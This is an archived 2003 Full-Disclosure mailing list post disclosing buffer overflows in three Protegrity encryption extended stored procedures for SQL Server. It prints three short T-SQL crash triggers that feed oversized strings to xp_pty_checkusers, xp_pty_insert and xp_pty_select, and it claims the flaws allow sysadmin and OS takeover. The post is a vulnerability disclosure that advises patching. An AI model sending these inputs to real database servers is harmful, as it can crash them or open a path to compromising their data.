| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: protegritysecvuln at yahoo.com (sss sss)
Subject: Protegrity buffer overflow
Additional details can be found at http://www.kb.cert.org/vuls/id/247545
There is a company that does encryption of databases called Protegrty. They use extended stored procedures to do the encryption and decryption. I tested 3 of the extended stored procedures and found all 3 vulnerable to buffer overflows.
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',1926))
execute master.dbo.xp_pty_checkusers 'as', @test
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',850))
execute master.dbo.xp_pty_insert @test, @test, @test
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',850))
execute master.dbo.xp_pty_select @test, @test, @test
These security holes are fully exploitable and would allow an attacker to perform any of the following:
1) become sa on the box
2) gain control of the operating system
3) decrypt the sensitive data Protegrity is encrypting
If you have this software, contact the vendor for the patch.
---------------------------------
Do you Yahoo!?
Yahoo! Web Hosting - establish your business online
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030313/9cdaeb7d/attachment.html
Powered by blists - more mailing lists